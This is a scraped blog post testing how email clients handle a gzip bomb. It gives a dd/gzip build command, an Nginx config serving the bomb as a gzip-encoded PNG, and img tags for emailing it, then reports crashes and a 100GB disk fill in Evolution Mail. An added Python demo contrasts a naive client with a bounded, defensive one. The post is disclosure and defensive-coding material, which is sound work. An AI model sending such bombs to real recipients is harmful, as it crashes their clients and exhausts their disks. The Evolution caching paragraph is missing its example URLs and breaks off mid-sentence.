This page was created programmatically; to read the article in its original location you can go to the link below:
https://www.grepular.com/Fun_with_Gzip_Bombs_and_Email_Clients
and if you wish to remove this article from our site please contact us
Gzip/Zip bombs have been a thing for decades. Let's create a 10MB gzip file which decompresses to 10GB:
dd if=/dev/zero bs=1G count=10 | gzip > 10gb.gz
This is called a Gzip bomb, because when it's decompressed, it blows up to a much larger size (~1000x bigger). Add it to your website's document root and configure Nginx to serve it up as an image, with gzip Content-Encoding:
location /10gb.png {
    default_type image/png;
    add_header Content-Encoding gzip;
    try_files /10gb.gz =404;
}
Note that an add_header inside a location replaces any add_header directives inherited from the enclosing server block, so repeat any others you rely on here.
An HTTP client which fetches this file will see that the Content-Encoding is set to gzip and so will usually try to decompress it on the fly, meaning you'll have sent 10MB of data over the network, but the HTTP client will now have 10GB of data to deal with.
Firefox doesn't seem to have an issue with this. It figures out quite quickly that it's not an image and doesn't seem to store the decompressed data anywhere.
What about email clients though? And what about the proxies that some email services have started to use to hide your IP from the sender? Send an HTML email containing:
<img src="https://YOUR_WEBSITE/10gb.png">
Thunderbird and Gmail's web proxies start to fetch the image, but bail out early before finishing fetching the 10MB. I'm not sure if this is because they can tell it's not an image, or because they're decompressing it and hit a limit. Hopefully the latter. Either way, it works well.
Protonmail and iCloud webmail's proxies seem to fetch the whole 10MB file, but discard it. Protonmail will warn you that it didn't load the image, and offer you the option of loading it directly from your web browser (not using their proxy). If you say yes, you leak your IP, but the browser doesn't crash. This works well.
Fastmail webmail's proxies downloaded the full 10MB and proceeded to send me 385MB of data before giving up. The UI remained responsive, so although they should have bailed earlier, at least it works. I wonder if there's a 10GB file sat on one of their servers now.
iOS Mail partially downloads the file and then crashes. Not a great experience, but not the end of the World; you can just delete the email when you get back in.
Evolution Mail has no protection for this. It downloads the whole 10MB and then proceeds to fully decompress it into its cache/evolution/http/ directory. I sent myself an email with this in the body:
<img src="https://YOUR_HOSTNAME/10gb.png">
<img src="https://YOUR_HOSTNAME/10gb.png?x=1">
<img src="https://YOUR_HOSTNAME/10gb.png?x=2">
<img src="https://YOUR_HOSTNAME/10gb.png?x=3">
<img src="https://YOUR_HOSTNAME/10gb.png?x=4">
<img src="https://YOUR_HOSTNAME/10gb.png?x=5">
<img src="https://YOUR_HOSTNAME/10gb.png?x=6">
<img src="https://YOUR_HOSTNAME/10gb.png?x=7">
<img src="https://YOUR_HOSTNAME/10gb.png?x=8">
<img src="https://YOUR_HOSTNAME/10gb.png?x=9">
In less than a minute after clicking "Load remote content", Evolution Mail had added 100GB of data to my laptop's disk.
It's always a good idea to code defensively when you're fetching data from external services. Always assume some smart arse will make their server send you more data than is reasonable.
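As an added example (not code from the original post, and not from any of the clients it tests), here is both halves of the situation above in Python: a local HTTP server stands in for the Nginx location and serves a constructed, much smaller bomb (32 MiB of zeros gzipped to roughly 32 KiB, the same ~1000x ratio) with Content-Encoding: gzip; a naive client inflates the whole thing; a bounded client honours the encoding but stops at a wire-byte budget, an inflated-byte budget, or as soon as a response labelled image/png doesn't start with the PNG signature. The paths /10gb.png and /10gb.bin, the budgets and the sizes are assumptions chosen for the demo.

```python
"""Added example, not code from the original post: a gzip-bomb server and
two HTTP clients, one trusting and one bounded. Sizes, paths and budgets
are assumptions chosen for the demo."""
import gzip
import http.client
import threading
import zlib
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed sample: 32 MiB of zeros gzips to roughly 32 KiB (about 1000x),
# the same ratio as the post's 10MB -> 10GB file, but safe to build in memory.
BOMB_INFLATED = 32 * 1024 * 1024
BOMB = gzip.compress(b"\0" * BOMB_INFLATED, compresslevel=9)
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


class BombHandler(BaseHTTPRequestHandler):
    """Stands in for the Nginx location: every path gets the gzip body,
    labelled image/png for *.png and application/octet-stream otherwise."""

    def do_GET(self):
        ctype = "image/png" if self.path.endswith(".png") else "application/octet-stream"
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Encoding", "gzip")
        self.send_header("Content-Length", str(len(BOMB)))
        self.end_headers()
        self.wfile.write(BOMB)

    def log_message(self, *args):  # keep the demo quiet
        pass


def fetch_naive(host, port, path):
    """What a trusting client does: read the body and inflate all of it.
    Returns the inflated size."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        body = resp.read()
        if resp.getheader("Content-Encoding", "").lower() == "gzip":
            body = gzip.decompress(body)  # ~32 KiB on the wire becomes 32 MiB here
        return len(body)
    finally:
        conn.close()


def _reject(result, reason):
    result.update(status="rejected", reason=reason)
    return result


def fetch_bounded(host, port, path, max_wire=1 << 20, max_inflated=4 << 20):
    """Honour Content-Encoding: gzip, but stop as soon as the bytes on the
    wire or the inflated bytes pass their budget, and give up early when a
    response labelled image/png does not start with the PNG signature."""
    result = {"status": "ok", "reason": "", "wire": 0, "inflated": 0}
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request("GET", path, headers={"Accept-Encoding": "gzip"})
        resp = conn.getresponse()
        gzipped = resp.getheader("Content-Encoding", "").lower() == "gzip"
        is_png = resp.getheader("Content-Type", "").startswith("image/png")
        # 16 + MAX_WBITS tells zlib to expect the gzip wrapper.
        inflater = zlib.decompressobj(16 + zlib.MAX_WBITS) if gzipped else None
        head = b""
        while chunk := resp.read(64 * 1024):
            result["wire"] += len(chunk)
            if result["wire"] > max_wire:
                return _reject(result, f"more than {max_wire} bytes on the wire")
            pending = chunk
            while pending:
                if inflater is None:
                    out, pending = pending, b""
                else:
                    # Inflate in small steps: max_length caps this call's output
                    # and parks the rest of the input in unconsumed_tail.
                    step = min(64 * 1024, max_inflated - result["inflated"] + 1)
                    out = inflater.decompress(pending, step)
                    pending = inflater.unconsumed_tail
                result["inflated"] += len(out)
                if result["inflated"] > max_inflated:
                    return _reject(result, f"inflates past {max_inflated} bytes")
                if is_png and len(head) < len(PNG_MAGIC):
                    head += out[: len(PNG_MAGIC) - len(head)]
                    if len(head) == len(PNG_MAGIC) and head != PNG_MAGIC:
                        return _reject(result, "labelled PNG but body is not a PNG")
        return result
    finally:
        conn.close()


def demo():
    """Serve the bomb on an ephemeral localhost port and run the clients."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), BombHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    host, port = srv.server_address
    try:
        return {
            "naive": fetch_naive(host, port, "/10gb.png"),
            "png": fetch_bounded(host, port, "/10gb.png"),
            "bin": fetch_bounded(host, port, "/10gb.bin"),
            "bin_big_budget": fetch_bounded(host, port, "/10gb.bin", max_inflated=64 << 20),
        }
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The naive client ends up holding all 32 MiB. The bounded client drops the "PNG" after one 64 KiB step because the bytes are not a PNG (the early bail-out the post sees in Firefox), drops the octet-stream version once it passes the 4 MiB inflation budget, and only completes it when handed a budget larger than the file. Both limits are enforced on the decompressed stream, which is the number that matters; Content-Length only tells you what crosses the wire.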
Another weird thing I noticed about Evolution Mail when testing this. It caches the downloaded remote content in a file with a filename consisting of an MD5 of the URL. But if you don't use one of the limited query string formats they like, they strip the query string from the MD5 calculation. According to Evolution Mail's cache these two URLs are the same and should be cached to the same file:
So if you receive an email containing an
[edit] Somebody has helpfully reported the above issues to the Evolution Mail project. I don't engage with that project directly anymore due to previous poor treatment by its members.